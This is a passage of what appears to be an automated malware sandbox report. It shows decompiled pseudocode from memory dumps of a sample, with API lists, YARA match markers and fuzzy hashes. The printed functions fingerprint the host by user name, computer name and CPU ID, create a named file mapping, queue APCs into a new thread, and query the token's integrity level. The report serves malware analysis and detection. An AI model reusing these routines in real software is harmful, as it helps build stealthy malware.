                                                                                                                                                                                                                                					} while (_t70 != 0);
                                                                                                                                                                                                                                					CloseHandle(_v44);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                				goto L25;
                                                                                                                                                                                                                                			}





























                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BBA007
                                                                                                                                                                                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02BBA013
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02BBA038
                                                                                                                                                                                                                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 02BBA054
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BBA06D
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BBA103
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02BBA112
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02BBA14C
                                                                                                                                                                                                                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02BB58BD,?), ref: 02BBA162
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BBA16D
                                                                                                                                                                                                                                  • Part of subcall function 02BB2932: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,052F9370,00000000,?,747DF710,00000000,747DF730), ref: 02BB2981
                                                                                                                                                                                                                                  • Part of subcall function 02BB2932: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052F93A8,?,00000000,30314549,00000014,004F0053,052F9364), ref: 02BB2A1E
                                                                                                                                                                                                                                  • Part of subcall function 02BB2932: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BBA080), ref: 02BB2A30
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BBA17F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3521023985-2342693527
                                                                                                                                                                                                                                • Opcode ID: 1ece691c3b4332970714ce2e756eeb03e0f5897b8225ffbb3baba657d888decc
                                                                                                                                                                                                                                • Instruction ID: daf1404ae69601d0cd7a14ce8016f74452bb0d9944db9289b1145f4bd08eed21
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ece691c3b4332970714ce2e756eeb03e0f5897b8225ffbb3baba657d888decc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24515BB1C01229AFCF12DFA4DC44DEEBFB9EF09360F604656F454A2180D7B49A54CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 69%
                                                                                                                                                                                                                                			E02B81210(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				struct _FILETIME* _v16;
                                                                                                                                                                                                                                				short _v60;
                                                                                                                                                                                                                                				struct _FILETIME* _t14;
                                                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                                                				long _t18;
                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                                                                                				long _t32;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t31 = __edx;
                                                                                                                                                                                                                                				_t14 =  &_v16;
                                                                                                                                                                                                                                				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                				_push(0x192);
                                                                                                                                                                                                                                				_push(0x54d38000);
                                                                                                                                                                                                                                				_push(_v12);
                                                                                                                                                                                                                                				_push(_v16);
                                                                                                                                                                                                                                				L02B82160();
                                                                                                                                                                                                                                				_push(_t14);
                                                                                                                                                                                                                                				_v16 = _t14;
                                                                                                                                                                                                                                				_t15 =  *0x2b841c4;
                                                                                                                                                                                                                                				_push(_t15 + 0x2b8505e);
                                                                                                                                                                                                                                				_push(_t15 + 0x2b85054);
                                                                                                                                                                                                                                				_push(0x16);
                                                                                                                                                                                                                                				_push( &_v60);
                                                                                                                                                                                                                                				_v12 = _t31;
                                                                                                                                                                                                                                				L02B8215A();
                                                                                                                                                                                                                                				_t18 = _a4;
                                                                                                                                                                                                                                				if(_t18 == 0) {
                                                                                                                                                                                                                                					_t18 = 0x1000;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t19 = CreateFileMappingW(0xffffffff, 0x2b841c8, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                                                                				_t34 = _t19;
                                                                                                                                                                                                                                				if(_t34 == 0) {
                                                                                                                                                                                                                                					_t32 = GetLastError();
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                						if(_t22 == 0) {
                                                                                                                                                                                                                                							_t32 = GetLastError();
                                                                                                                                                                                                                                							if(_t32 != 0) {
                                                                                                                                                                                                                                								goto L9;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							 *_a8 = _t34;
                                                                                                                                                                                                                                							 *_a12 = _t22;
                                                                                                                                                                                                                                							_t32 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t32 = 2;
                                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                                						CloseHandle(_t34);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t32;
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                0x02b8129f
                                                                                                                                                                                                                                0x02b812c8
                                                                                                                                                                                                                                0x02b812c9
                                                                                                                                                                                                                                0x02b812c9
                                                                                                                                                                                                                                0x02b81292
                                                                                                                                                                                                                                0x02b812df

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,02B810DD,0000000A,?,?), ref: 02B8121D
                                                                                                                                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02B81233
                                                                                                                                                                                                                                • _snwprintf.NTDLL ref: 02B81258
                                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,02B841C8,00000004,00000000,?,?), ref: 02B8127D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02B810DD,0000000A,?), ref: 02B81294
                                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 02B812A8
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02B810DD,0000000A,?), ref: 02B812C0
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,02B810DD,0000000A), ref: 02B812C9
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02B810DD,0000000A,?), ref: 02B812D1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1724014008-1084903527
                                                                                                                                                                                                                                • Opcode ID: 1536202e55bc7fd05dcc13d6f7ae0b11ff5fe1472fd4b48f7f39795e95d1b451
                                                                                                                                                                                                                                • Instruction ID: 25845927d8603a444477181d585098f18e0dc6c32e78177fad668680bfdfcc55
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1536202e55bc7fd05dcc13d6f7ae0b11ff5fe1472fd4b48f7f39795e95d1b451
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9921A1B2A41108AFDB11BFA8CC84EAE77EDEB44794F1144A5FA0DE7180D7309946CF61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E02BB1DF5(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				struct _FILETIME* _v12;
                                                                                                                                                                                                                                				short _v56;
                                                                                                                                                                                                                                				struct _FILETIME* _t12;
                                                                                                                                                                                                                                				intOrPtr _t13;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t27 = __edx;
                                                                                                                                                                                                                                				_t12 =  &_v12;
                                                                                                                                                                                                                                				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                                                                				_push(0x192);
                                                                                                                                                                                                                                				_push(0x54d38000);
                                                                                                                                                                                                                                				_push(_v8);
                                                                                                                                                                                                                                				_push(_v12);
                                                                                                                                                                                                                                				L02BBAEBA();
                                                                                                                                                                                                                                				_push(_t12);
                                                                                                                                                                                                                                				_v12 = _t12;
                                                                                                                                                                                                                                				_t13 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                				_t5 = _t13 + 0x2bbe876; // 0x52f8e1e
                                                                                                                                                                                                                                				_t6 = _t13 + 0x2bbe59c; // 0x530025
                                                                                                                                                                                                                                				_push(0x16);
                                                                                                                                                                                                                                				_push( &_v56);
                                                                                                                                                                                                                                				_v8 = _t27;
                                                                                                                                                                                                                                				L02BBABDA();
                                                                                                                                                                                                                                				_t17 = CreateFileMappingW(0xffffffff, 0x2bbd2e4, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                                                                				_t30 = _t17;
                                                                                                                                                                                                                                				if(_t30 == 0) {
                                                                                                                                                                                                                                					_t28 = GetLastError();
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                						if(_t21 == 0) {
                                                                                                                                                                                                                                							_t28 = GetLastError();
                                                                                                                                                                                                                                							if(_t28 != 0) {
                                                                                                                                                                                                                                								goto L6;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							 *_a4 = _t30;
                                                                                                                                                                                                                                							 *_a8 = _t21;
                                                                                                                                                                                                                                							_t28 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t28 = 2;
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						CloseHandle(_t30);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t28;
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02BB5790,?,?,4D283A53,?,?), ref: 02BB1E01
                                                                                                                                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02BB1E17
                                                                                                                                                                                                                                • _snwprintf.NTDLL ref: 02BB1E3C
                                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,02BBD2E4,00000004,00000000,00001000,?), ref: 02BB1E58
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BB5790,?,?,4D283A53), ref: 02BB1E6A
                                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 02BB1E81
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02BB5790,?,?), ref: 02BB1EA2
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BB5790,?,?,4D283A53), ref: 02BB1EAA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1814172918-1701360479
                                                                                                                                                                                                                                • Opcode ID: 0db903375d74cc2196f0e0c18c862a7027f89a9aa8642a396da4fbb3cd94cab5
                                                                                                                                                                                                                                • Instruction ID: a6f4e27adabc05ccbd646e701e0ed48b1235ea3e69f5c15671bccea796c21c21
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0db903375d74cc2196f0e0c18c862a7027f89a9aa8642a396da4fbb3cd94cab5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D21AE76A40204BFD723DB68CC45FEE3BA9AF84794F214166F609A7190D7F0E905CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E02BB9DE1(char __eax, void* __esi) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                				signed int _v28;
                                                                                                                                                                                                                                				long _t34;
                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                				long _t50;
                                                                                                                                                                                                                                				char _t59;
                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                				void* _t64;
                                                                                                                                                                                                                                				char _t65;
                                                                                                                                                                                                                                				intOrPtr* _t67;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t69 = __esi;
                                                                                                                                                                                                                                				_t65 = __eax;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_v12 = __eax;
                                                                                                                                                                                                                                				if(__eax == 0) {
                                                                                                                                                                                                                                					_t59 =  *0x2bbd2a8; // 0xd448b889
                                                                                                                                                                                                                                					_v12 = _t59;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t64 = _t69;
                                                                                                                                                                                                                                				E02BB4E13( &_v12, _t64);
                                                                                                                                                                                                                                				if(_t65 != 0) {
                                                                                                                                                                                                                                					 *_t69 =  *_t69 ^  *0x2bbd2dc ^ 0x46d76429;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                                                                					_t50 = _v8;
                                                                                                                                                                                                                                					if(_t50 != 0) {
                                                                                                                                                                                                                                						_t62 = RtlAllocateHeap( *0x2bbd270, 0, _t50 + _t50);
                                                                                                                                                                                                                                						if(_t62 != 0) {
                                                                                                                                                                                                                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                                                                								_t64 = _t62;
                                                                                                                                                                                                                                								 *_t69 =  *_t69 ^ E02BB680B(_v8 + _v8, _t64);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							HeapFree( *0x2bbd270, 0, _t62);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t61 = __imp__;
                                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                				_t34 = _v8;
                                                                                                                                                                                                                                				if(_t34 != 0) {
                                                                                                                                                                                                                                					_t68 = RtlAllocateHeap( *0x2bbd270, 0, _t34 + _t34);
                                                                                                                                                                                                                                					if(_t68 != 0) {
                                                                                                                                                                                                                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                                                                							_t64 = _t68;
                                                                                                                                                                                                                                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02BB680B(_v8 + _v8, _t64);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						HeapFree( *0x2bbd270, 0, _t68);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				asm("cpuid");
                                                                                                                                                                                                                                				_t67 =  &_v28;
                                                                                                                                                                                                                                				 *_t67 = 1;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                                                                                                                                				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                                                                				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                                                                				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                                                                                                                                				return _t39;
                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                0x02bb9eb0
                                                                                                                                                                                                                                0x02bb9eb7
                                                                                                                                                                                                                                0x02bb9eb7
                                                                                                                                                                                                                                0x02bb9ec3
                                                                                                                                                                                                                                0x02bb9ec3
                                                                                                                                                                                                                                0x02bb9e9e
                                                                                                                                                                                                                                0x02bb9ece
                                                                                                                                                                                                                                0x02bb9ed0
                                                                                                                                                                                                                                0x02bb9ed3
                                                                                                                                                                                                                                0x02bb9ed5
                                                                                                                                                                                                                                0x02bb9ed8
                                                                                                                                                                                                                                0x02bb9edb
                                                                                                                                                                                                                                0x02bb9ee5
                                                                                                                                                                                                                                0x02bb9ee9
                                                                                                                                                                                                                                0x02bb9eed

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 02BB9E18
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 02BB9E2F
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 02BB9E3C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02BB587F), ref: 02BB9E5D
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BB9E84
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02BB9E98
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BB9EA5
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02BB587F), ref: 02BB9EC3
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3239747167-1536154274
                                                                                                                                                                                                                                • Opcode ID: 90bdfca11676db0fe491d6d72a5f904e932f2d646cc6ddcc47210332e4e462ba
                                                                                                                                                                                                                                • Instruction ID: 0baa41d87d529462fae2a4cdcd658ad910660e42a0d9c9f61d6bbf276595cf7f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90bdfca11676db0fe491d6d72a5f904e932f2d646cc6ddcc47210332e4e462ba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F313971A0020AAFDB12DFA9CD80ABEB7FAFF48240F514469E545D3210E7B0EE159F20
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B81000(long _a4, DWORD* _a12) {
                                                                                                                                                                                                                                				_Unknown_base(*)()* _v0;
                                                                                                                                                                                                                                				void* _t4;
                                                                                                                                                                                                                                				long _t6;
                                                                                                                                                                                                                                				long _t11;
                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x2b841c0, 0, _a12); // executed
                                                                                                                                                                                                                                				_t13 = _t4;
                                                                                                                                                                                                                                				if(_t13 != 0) {
                                                                                                                                                                                                                                					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                                                                					if(_t6 == 0) {
                                                                                                                                                                                                                                						_t11 = GetLastError();
                                                                                                                                                                                                                                						TerminateThread(_t13, _t11);
                                                                                                                                                                                                                                						CloseHandle(_t13);
                                                                                                                                                                                                                                						_t13 = 0;
                                                                                                                                                                                                                                						SetLastError(_t11);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t13;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 02B81017
                                                                                                                                                                                                                                • QueueUserAPC.KERNEL32(?,00000000,?), ref: 02B8102C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 02B81037
                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 02B81041
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02B81048
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02B81051
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 3832013932-1084903527
                                                                                                                                                                                                                                • Opcode ID: 289d3c699f36fe67e19f795a10f5c3f20fb2d8050d8f169e3e27df589e892a72
                                                                                                                                                                                                                                • Instruction ID: bc192ff3b1296028ffdf682959613f555546058da9144a046264d2b3bb1f979f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 289d3c699f36fe67e19f795a10f5c3f20fb2d8050d8f169e3e27df589e892a72
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22F08932D81651FBD3221BA1AC0CF5BBFE8FB08F91F000944F60DA6040C7218425DB51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB59B4(long* _a4) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void _v16;
                                                                                                                                                                                                                                				long _v20;
                                                                                                                                                                                                                                				int _t33;
                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v16 = 1;
                                                                                                                                                                                                                                				_v20 = 0x2000;
                                                                                                                                                                                                                                				if( *0x2bbd294 > 5) {
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                                                                                                                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                                                                                                                						_v8 = 0;
                                                                                                                                                                                                                                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                						if(_v8 != 0) {
                                                                                                                                                                                                                                							_t46 = E02BB5157(_v8);
                                                                                                                                                                                                                                							if(_t46 != 0) {
                                                                                                                                                                                                                                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                                                                                                                								if(_t33 != 0) {
                                                                                                                                                                                                                                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								E02BB53BB(_t46);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						CloseHandle(_v12);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				 *_a4 = _v20;
                                                                                                                                                                                                                                				return _v16;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02BB59E6
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02BB5A06
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02BB5A16
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB5A66
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02BB5A39
                                                                                                                                                                                                                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02BB5A41
                                                                                                                                                                                                                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02BB5A51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1295030180-0
                                                                                                                                                                                                                                • Opcode ID: a20341934e137b1924f84aaa38d88fac4b42be317574c8b8139713429bc9fe2c
                                                                                                                                                                                                                                • Instruction ID: 5cd827c92419cbe2f6729f9630178e78d48d07e11624d7ba9185bacb8751ec56
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a20341934e137b1924f84aaa38d88fac4b42be317574c8b8139713429bc9fe2c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4211975900209BFEB129F94DC84EEEBBB9EF09344F4044A6E910A7250C7B58A55DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B81C61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
